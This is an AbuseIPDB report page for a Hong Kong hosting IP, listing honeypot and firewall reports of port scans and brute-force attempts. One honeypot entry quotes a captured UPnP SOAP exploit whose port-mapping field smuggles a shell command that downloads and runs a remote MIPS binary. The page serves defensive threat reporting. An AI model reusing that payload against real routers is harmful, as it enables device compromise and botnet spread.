JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 103.212.187.230

103.212.187.230 was found in our database!

This IP was reported 69 times. Confidence of Abuse is 100%: ?

100%

ISP	Ampus Limited
Usage Type	Data Center/Web Hosting/Transit
ASN	AS401701
Domain Name	ampus.hk
Country	🇭🇰 Hong Kong
City	Kadoorie, Kowloon City

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 103.212.187.230

Whois 103.212.187.230

IP Abuse Reports for 103.212.187.230:

This IP address has been reported a total of 69 times from 46 distinct sources. 103.212.187.230 was first reported on June 16th 2026, and the most recent report was 1 day ago.

Recent Reports: We have received reports of abusive activity from this IP address within the last week. It is potentially still actively engaged in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇺🇸 rjdefrancisco	2026-06-18 07:07:15 (1 day ago)	Unwanted traffic detected by honeypot on June 17, 2026: port scans (1 port 23 scan).	Port Scan Brute-Force SSH
Anonymous	2026-06-18 05:02:07 (1 day ago)	<jail> banned by fail2ban	Brute-Force Web App Attack
🇬🇧 gbzret4d	2026-06-18 03:51:51 (1 day ago)	Honeypot [uk-production01]: HTTP/1.1 request on 52869 POST /picdesc.xml User-Agent: Mozilla/4.0 (co ... show more Honeypot [uk-production01]: HTTP/1.1 request on 52869 POST /picdesc.xml User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Accept: / Accept-Encoding: gzip, deflate POST Data: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf zuki; wget http://109.104.153.60/bins/frosty.mips -O zuki; chmod 777 zuki; ./zuki realtek.selfrep`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>; 52869 [2] TCP show less	Hacking Bad Web Bot
🇩🇪 Admins@FBN	2026-06-18 02:25:38 (1 day ago)	FW-PortScan: Traffic Blocked srcport=22129 dstport=8080	Port Scan
🇳🇱 COMPLEX	2026-06-18 01:45:24 (1 day ago)	Unsolicited TCP traffic \| Action: DROP \| Port 52869	Brute-Force
🇺🇸 MPL	2026-06-18 01:05:37 (1 day ago)	tcp/23	Port Scan
🇳🇱 COMPLEX	2026-06-18 00:56:01 (1 day ago)	Unsolicited TCP traffic \| Action: DROP \| Port 23	Brute-Force
🇺🇸 RAP	2026-06-18 00:34:12 (1 day ago)	2026-06-18 00:34:12 UTC Unauthorized activity to TCP port 23. Telnet	Port Scan
🇩🇪 centurion	2026-06-18 00:20:17 (1 day ago)	Unauthorized attempt on lab [52869/tcp] Source port: 36843 TTL: 42 Packet length: 44 TOS: 0x00 https ... show more Unauthorized attempt on lab [52869/tcp] Source port: 36843 TTL: 42 Packet length: 44 TOS: 0x00 https://github.com/sefinek/UFW-AbuseIPDB-Reporter show less	Port Scan
🇺🇸 xmission.com	2026-06-17 23:44:36 (1 day ago)	Blocked by UFW (TCP on 23) Source port: 30493 TTL: 50 Packet length: 44 TOS: 0x00 This report (for ... show more Blocked by UFW (TCP on 23) Source port: 30493 TTL: 50 Packet length: 44 TOS: 0x00 This report (for 103.212.187.230) was generated by: https://github.com/sefinek/UFW-AbuseIPDB-Reporter show less	Port Scan Hacking Brute-Force
🇺🇸 xmission.com	2026-06-17 23:26:49 (1 day ago)	Blocked by UFW (TCP on 23) Source port: 17909 TTL: 47 Packet length: 44 TOS: 0x08 This report (for ... show more Blocked by UFW (TCP on 23) Source port: 17909 TTL: 47 Packet length: 44 TOS: 0x08 This report (for 103.212.187.230) was generated by: https://github.com/sefinek/UFW-AbuseIPDB-Reporter show less	Port Scan Hacking Brute-Force
🇺🇸 MPL	2026-06-17 23:22:14 (1 day ago)	tcp/2323	Port Scan
🇨🇿 Countryman	2026-06-17 23:14:03 (1 day ago)	repeated unauthorized connection attempts, host sweep, port 23	Hacking Brute-Force
🇨🇿 Countryman	2026-06-17 23:14:03 (1 day ago)	repeated unauthorized connection attempts, host sweep, port 23	Hacking Brute-Force
🇭🇰 mutebot.net	2026-06-17 22:59:11 (1 day ago)	SRC=103.212.187.230, PROTO=TCP, SPT=24250, DPT=23	Port Scan

Showing 1 to 15 of 69 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇺🇸 162.216.150.118

🇳🇱 93.123.109.163

🇺🇸 54.91.71.131

🇺🇸 44.247.11.101

🇺🇸 2607:f8b0:400c:c15::120

🇨🇳 221.12.37.6

🇹🇭 171.100.156.38

🇺🇸 147.185.132.150

🇨🇳 120.48.53.174

🇷🇺 81.177.101.45

🇺🇸 66.132.224.225

🇸🇬 47.84.140.143

🇳🇱 45.153.34.112

🇺🇸 44.213.25.74

🇪🇬 41.128.181.199

🇩🇪 185.242.3.195

🇮🇩 182.253.135.104

🇺🇸 172.86.114.202

🇵🇰 103.26.86.165

🇺🇸 44.191.75.83